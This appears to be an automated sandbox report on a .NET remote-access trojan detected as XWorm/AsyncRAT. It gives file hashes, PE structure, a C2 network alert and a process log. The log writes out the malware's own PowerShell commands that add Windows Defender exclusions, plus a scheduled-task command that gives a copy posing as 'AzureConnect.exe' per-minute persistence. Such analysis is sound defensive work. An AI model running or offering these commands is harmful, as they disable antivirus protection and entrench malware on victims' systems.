                                                              SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                              SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                              SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                              Malicious:false
                                                              Preview:@...e...........................................................
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Entropy (8bit):6.045708896884392
                                                              TrID:
                                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                              • Win32 Executable (generic) a (10002005/4) 49.75%
                                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                              • Windows Screen Saver (13104/52) 0.07%
                                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                                              File name:file.exe
                                                              File size:46'592 bytes
                                                              MD5:2982d11d3b0789476831097f0e213007
                                                              SHA1:b2b7d5f73b65c3df4d3da8a5a266f47d3685a044
                                                              SHA256:bdff38ae5b6ac3ab4135894064d15e3ab14efe28b9463c98b185fb0cdfd3ad1f
                                                              SHA512:b496db043ee6758e63c3f2aa2e2b03775eaaf657638daa0b989ed85221a4c98fb7fbd53f836ca4d12dcf1c536222d65d398d543f39ad0447666e4842a39f8cde
                                                              SSDEEP:768:JXDCY0GcQ5pcP7tbaRcqKlnFPc9Goxq6sOuhe/gDu/cjGBd00:JOLeKkRMFk9Gv6sOuOUzGBdl
                                                              TLSH:84235B4877924215EABD1FF06AB3A24246B9F9137913EB5F0CD486CA2F637814A407F7
                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Hg................................. ........@.. ....................................@................................
                                                              Icon Hash:0f2165e46465038f
                                                              Entrypoint:0x40b3fe
                                                              Entrypoint Section:.text
                                                              Digitally signed:false
                                                              Imagebase:0x400000
                                                              Subsystem:windows gui
                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                              Time Stamp:0x67489EE5 [Thu Nov 28 16:48:37 2024 UTC]
                                                              TLS Callbacks:
                                                              CLR (.Net) Version:
                                                              OS Version Major:4
                                                              OS Version Minor:0
                                                              File Version Major:4
                                                              File Version Minor:0
                                                              Subsystem Version Major:4
                                                              Subsystem Version Minor:0
                                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                              Instruction
                                                              jmp dword ptr [00402000h]
                                                              Name | Virtual Address | Virtual Size | Is in Section
                                                              IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                              IMAGE_DIRECTORY_ENTRY_IMPORT | 0xb3a8 | 0x53 | .text
                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc000 | 0x1a04 | .rsrc
                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                              IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xe000 | 0xc | .reloc
                                                              IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                              IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                              IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                                              IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                                              Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                              .text | 0x2000 | 0x9404 | 0x9600 | a377ca66202582e93ab2cd2b78c8d770 | False | 0.48104166666666665 | data | 5.712354340415364 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                              .rsrc | 0xc000 | 0x1a04 | 0x1c00 | 78155b599470f796dd7e544eded26f97 | False | 0.8058035714285714 | data | 7.44234779107812 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                              .reloc | 0xe000 | 0xc | 0x200 | 251cf3061796844a58b298fe856f5db3 | False | 0.041015625 | data | 0.06116285224115448 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                              Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                                              RT_ICON | 0xc130 | 0x1498 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.963391502276176
                                                              RT_GROUP_ICON | 0xd5c8 | 0x14 | data | | | 0.95
                                                              RT_VERSION | 0xd5dc | 0x23c | data | | | 0.4772727272727273
                                                              RT_MANIFEST | 0xd818 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5469387755102041
                                                              DLL | Import
                                                              mscoree.dll | _CorExeMain
                                                              Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                                              2024-12-10T19:46:25.070884+0100 | 2855924 | ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound | 1 | 192.168.2.5 | 49818 | 147.185.221.24 | 3804 | TCP
                                                              Timestamp | Source Port | Dest Port | Source IP | Dest IP

                                                              Target ID:0
                                                              Start time:13:45:02
                                                              Start date:10/12/2024
                                                              Path:C:\Users\user\Desktop\file.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Users\user\Desktop\file.exe"
                                                              Imagebase:0xf20000
                                                              File size:46'592 bytes
                                                              MD5 hash:2982D11D3B0789476831097F0E213007
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000000.2018283335.0000000000F22000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000000.2018283335.0000000000F22000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen
                                                              Reputation:low
                                                              Has exited:false

                                                              Target ID:2
                                                              Start time:13:45:06
                                                              Start date:10/12/2024
                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe'
                                                              Imagebase:0x7ff7be880000
                                                              File size:452'608 bytes
                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:3
                                                              Start time:13:45:06
                                                              Start date:10/12/2024
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff6d64d0000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:5
                                                              Start time:13:45:14
                                                              Start date:10/12/2024
                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'file.exe'
                                                              Imagebase:0x7ff7be880000
                                                              File size:452'608 bytes
                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:6
                                                              Start time:13:45:14
                                                              Start date:10/12/2024
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff6d64d0000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:8
                                                              Start time:13:45:25
                                                              Start date:10/12/2024
                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exe'
                                                              Imagebase:0x7ff7be880000
                                                              File size:452'608 bytes
                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:9
                                                              Start time:13:45:25
                                                              Start date:10/12/2024
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff6d64d0000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:10
                                                              Start time:13:45:39
                                                              Start date:10/12/2024
                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'AzureConnect.exe'
                                                              Imagebase:0x7ff7be880000
                                                              File size:452'608 bytes
                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:11
                                                              Start time:13:45:39
                                                              Start date:10/12/2024
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff6d64d0000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:13
                                                              Start time:13:46:01
                                                              Start date:10/12/2024
                                                              Path:C:\Windows\System32\schtasks.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "AzureConnect" /tr "C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exe"
                                                              Imagebase:0x7ff636670000
                                                              File size:235'008 bytes
                                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:14
                                                              Start time:13:46:01
                                                              Start date:10/12/2024
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff6d64d0000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:15
                                                              Start time:13:46:03
                                                              Start date:10/12/2024
                                                              Path:C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exe"
                                                              Imagebase:0x340000
                                                              File size:46'592 bytes
                                                              MD5 hash:2982D11D3B0789476831097F0E213007
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exe, Author: Joe Security
                                                              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exe, Author: ditekSHen
                                                              Antivirus matches:
                                                              • Detection: 100%, Avira
                                                              • Detection: 100%, Joe Sandbox ML
                                                              • Detection: 79%, ReversingLabs
                                                              Has exited:true

                                                              Target ID:16
                                                              Start time:13:47:01
                                                              Start date:10/12/2024
                                                              Path:C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exe"
                                                              Imagebase:0x730000
                                                              File size:46'592 bytes
                                                              MD5 hash:2982D11D3B0789476831097F0E213007
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true


                                                                Execution Graph

                                                                Execution Coverage:17.9%
                                                                Dynamic/Decrypted Code Coverage:100%
                                                                Signature Coverage:0%
                                                                Total number of Nodes:3
                                                                Total number of Limit Nodes:0
                                                                execution_graph 4878 7ff848f11caa 4879 7ff848f12360 RtlSetProcessIsCritical 4878->4879 4881 7ff848f12412 4879->4881

                                                                Control-flow Graph

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3318497593.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff848f10000_file.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: B
                                                                • API String ID: 0-1255198513
                                                                • Opcode ID: 3ac8d233af04f06bee34eef84b6fe0457276baa902c70a9723edff268a2d2cc0
                                                                • Instruction ID: 7d6cda138dee1c97b6f674eba93eba77de55a5678dad6aa04b8e172cc5ac94ae
                                                                • Opcode Fuzzy Hash: 3ac8d233af04f06bee34eef84b6fe0457276baa902c70a9723edff268a2d2cc0
                                                                • Instruction Fuzzy Hash: B6D2A370A18A099FEB48FF28C89977AB7E2FF98744F144579D04DD3291DF38A8818B45

                                                                Control-flow Graph

                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3318497593.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff848f10000_file.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 90b17306681b944c5d20cd0ebb1f374063f8db4641784a1c30f9756047023845
                                                                • Instruction ID: 3bd1c9891c846ad467b22c406e1bc7e8132b1b830d88394e7c02511f374ff6d5
                                                                • Opcode Fuzzy Hash: 90b17306681b944c5d20cd0ebb1f374063f8db4641784a1c30f9756047023845
                                                                • Instruction Fuzzy Hash: B7F1B23091CA8D8FEBA8EF28C8557E937E1FF54350F44426AE84DC7291DF34A9458B86

                                                                Control-flow Graph

                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3318497593.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff848f10000_file.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a934b918261e9cf724694c881f96fbca9a2fcdb607f0c0e765448939ef3d112c
                                                                • Instruction ID: 450b8d6ebb1fa117c6754adff6114ec2dac12522169be5bba0246bce1e20c656
                                                                • Opcode Fuzzy Hash: a934b918261e9cf724694c881f96fbca9a2fcdb607f0c0e765448939ef3d112c
                                                                • Instruction Fuzzy Hash: 72E1C030A0CA4E8FEBA9EF28C8557E977D1EF54350F54422ED84DC3695CF78A8448B81

                                                                Control-flow Graph

                                                                control_flow_graph 308 7ff848f1232d-7ff848f12410 RtlSetProcessIsCritical 312 7ff848f12418-7ff848f1244d 308->312 313 7ff848f12412 308->313 313->312
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3318497593.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff848f10000_file.jbxd
                                                                Similarity
                                                                • API ID: CriticalProcess
                                                                • String ID:
                                                                • API String ID: 2695349919-0
                                                                • Opcode ID: c1214565ffc6f5c75d09663357b517d4f63f7fb694584d9c5cd8022a1c0e6fdf
                                                                • Instruction ID: fcec6d5a6dd77e4433bafce33c581c14a7c75dc874d65b3262a536b8a0974c84
                                                                • Opcode Fuzzy Hash: c1214565ffc6f5c75d09663357b517d4f63f7fb694584d9c5cd8022a1c0e6fdf
                                                                • Instruction Fuzzy Hash: F941C33190C6588FDB19DF98D845AE9BBF0FF56311F04416ED08AC3692CB786846CB91

                                                                Control-flow Graph

                                                                control_flow_graph 315 7ff848f11caa-7ff848f123aa 318 7ff848f123b2-7ff848f12410 RtlSetProcessIsCritical 315->318 319 7ff848f12418-7ff848f1244d 318->319 320 7ff848f12412 318->320 320->319
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3318497593.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff848f10000_file.jbxd
                                                                Similarity
                                                                • API ID: CriticalProcess
                                                                • String ID:
                                                                • API String ID: 2695349919-0
                                                                • Opcode ID: 1f7a071ea4b40abbaadc0922abfd1d9e8947696d1c49810728c00e514cf9a4a4
                                                                • Instruction ID: 9d6dc9e5648c04e3547a7f81fc1fce9b2b3199948d695347817acb4fc07067e4
                                                                • Opcode Fuzzy Hash: 1f7a071ea4b40abbaadc0922abfd1d9e8947696d1c49810728c00e514cf9a4a4
                                                                • Instruction Fuzzy Hash: CA31C231908A188FDB18DB9CD845BF9BBF0FF55311F14412EE08AD3682CB7468468B91
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2140094897.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_7ff849000000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (B%I$(B%I$(B%I$(B%I$(B%I
                                                                • API String ID: 0-1877043794
                                                                • Opcode ID: c013c4f197c5704e977299a1ecd5b23ff8a725fc560e77006fa889af719b4ae6
                                                                • Instruction ID: 94eee15f0b6c0a93ef4af04d058432221011e5ef99d23d8e46355084b493db5e
                                                                • Opcode Fuzzy Hash: c013c4f197c5704e977299a1ecd5b23ff8a725fc560e77006fa889af719b4ae6
                                                                • Instruction Fuzzy Hash: 99D14431D0EACA5FEF65AF2868155B5BBE1EF16394F0802FAD44DD7093EA18D805C352
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2140094897.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_7ff849000000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 8>%I
                                                                • API String ID: 0-3722309147
                                                                • Opcode ID: 7cf09015f0bcccd7bbc464be200f687598ef75f7d997e8cd3b96c9bf5bbf4d87
                                                                • Instruction ID: 01df258b96635e710718bd2d3b2a7e6ab03aa390aea42ad1b92b1280985adee4
                                                                • Opcode Fuzzy Hash: 7cf09015f0bcccd7bbc464be200f687598ef75f7d997e8cd3b96c9bf5bbf4d87
                                                                • Instruction Fuzzy Hash: 0251E732E0DA864FEBA9EE1C64115B577D2EF54260F5801FAC14EC7193FE28EC158345
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2140094897.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_7ff849000000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 8>%I
                                                                • API String ID: 0-3722309147
                                                                • Opcode ID: 2b17ccc3b6ae5b8de2a2c481961ac108545bd372e5a57e4d1287f8dbc2af03a8
                                                                • Instruction ID: 173bde0c96228ca90d809c6e6ed9077fc97efd5f5eaceb3bb6154a2780fc49c8
                                                                • Opcode Fuzzy Hash: 2b17ccc3b6ae5b8de2a2c481961ac108545bd372e5a57e4d1287f8dbc2af03a8
                                                                • Instruction Fuzzy Hash: D8218F32E1D9C74FEBB9EE18A4511B476D2EF64290B4905F9C01EC71A3FE28EC148649
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2139744042.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_7ff848f30000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 22ed98d41d416b55d31b096e379b1c4e45325bb22e890b908d0eda6cdc39be8d
                                                                • Instruction ID: 463149a1eee16c0cb3a9bec5ddc63dd2e4574c52d176fe0353ead91acda9f494
                                                                • Opcode Fuzzy Hash: 22ed98d41d416b55d31b096e379b1c4e45325bb22e890b908d0eda6cdc39be8d
                                                                • Instruction Fuzzy Hash: DE414D7281EBD58FD743A77868660E57FB0EF13268F0901F7D0888E0A3DA1D5899C766
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2139744042.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_7ff848f30000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 50b9bde83bb6d418f75a7e62da8e564e31e436dea860488d9e065a0957960ec4
                                                                • Instruction ID: 644c7a560c6e31fa6719edb9c8f8f036537e9b8bf07f1b3a357ee1667dd2400b
                                                                • Opcode Fuzzy Hash: 50b9bde83bb6d418f75a7e62da8e564e31e436dea860488d9e065a0957960ec4
                                                                • Instruction Fuzzy Hash: 5931F77191CB489FDB5C9B5CA8066F97BE0FB99711F00412FE449D3692CB20A8568BC6
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2139378659.00007FF848E1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E1D000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_7ff848e1d000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 89e69226a11e628b629792c410fab283fb35893eae7f4e3492a4bb5752e59bcc
                                                                • Instruction ID: 54db2b2dfb116b0cf0f8b1ddfcc551586cc93a79aa5e64cb479a5fa325cc6d4a
                                                                • Opcode Fuzzy Hash: 89e69226a11e628b629792c410fab283fb35893eae7f4e3492a4bb5752e59bcc
                                                                • Instruction Fuzzy Hash: 4341157180DBC54FE39A9B3898559523FF0FF52360F1505EFE088CB1A7DA25A84AC792
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2139744042.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_7ff848f30000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 8599907626d605771457137bce3d04b3fce24dfcede4b0baf985d37e2a97042a
                                                                • Instruction ID: 1c56cf489d51ccd959d2894707ab2aacd2523ae61bb2cf2a720cf355b10effbd
                                                                • Opcode Fuzzy Hash: 8599907626d605771457137bce3d04b3fce24dfcede4b0baf985d37e2a97042a
                                                                • Instruction Fuzzy Hash: 5021277080DB884FEB09DB68984AAF97FA4EB53321F04415BD445D71A3DA785846CB61
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2139744042.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_7ff848f30000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 3e8110072008822f9b851662dbd92c3d0a0b45f8918f2b52d7721439382d7d88
                                                                • Instruction ID: 1fde1e7c06bd8ad01fde8fdacf519f27676798cf7977af127a8e772823c5939c
                                                                • Opcode Fuzzy Hash: 3e8110072008822f9b851662dbd92c3d0a0b45f8918f2b52d7721439382d7d88
                                                                • Instruction Fuzzy Hash: 9501677111CB0C4FD744EF0CE451AA5B7E0FB95364F10056EE58AC3695DB36E882CB45
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2140094897.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_7ff849000000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e458824ac2bb0afaf3a1a84c0fca4d51d8c237dea1c7e916535f5bdb9794e1cd
                                                                • Instruction ID: 460117e5c1134c8b2fb8edf5c6c1c0c375303ea5f9655101926c4f1acf4e3ba5
                                                                • Opcode Fuzzy Hash: e458824ac2bb0afaf3a1a84c0fca4d51d8c237dea1c7e916535f5bdb9794e1cd
                                                                • Instruction Fuzzy Hash: 59F0B832A0C5848FDB68EE0CE4458A8B3E0FF04321B0500FAE149CB0A3EB26EC548764
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2139744042.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_7ff848f30000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: L_^4$L_^7$L_^F$L_^J
                                                                • API String ID: 0-3225005683
                                                                • Opcode ID: 02d8dffb2fc30e881c9c0a44405cd32b71f90e60e1d62c3e6a1fe4010585dcda
                                                                • Instruction ID: 0907d21456b919f780f717bd5e1c1cb1acc8cc2b6eeb632774ad829765d359f1
                                                                • Opcode Fuzzy Hash: 02d8dffb2fc30e881c9c0a44405cd32b71f90e60e1d62c3e6a1fe4010585dcda
                                                                • Instruction Fuzzy Hash: A52126B761A025AED3417BBDB8045EE3750DF942B8B4552B3D2988F043EB1C70868AE4
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2240736095.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_7ff848fe0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (B#I$(B#I$(B#I$(B#I$(B#I
                                                                • API String ID: 0-1620291718
                                                                • Opcode ID: cf7752ca5246e8f3c90375b625701aba2beb26a786f11bc60ff5280aacb8f0f0
                                                                • Instruction ID: 1f8428f6f7b2e3a179d9c4d53f1cef5e309e35d8bf5d367fe979c13d67e138a9
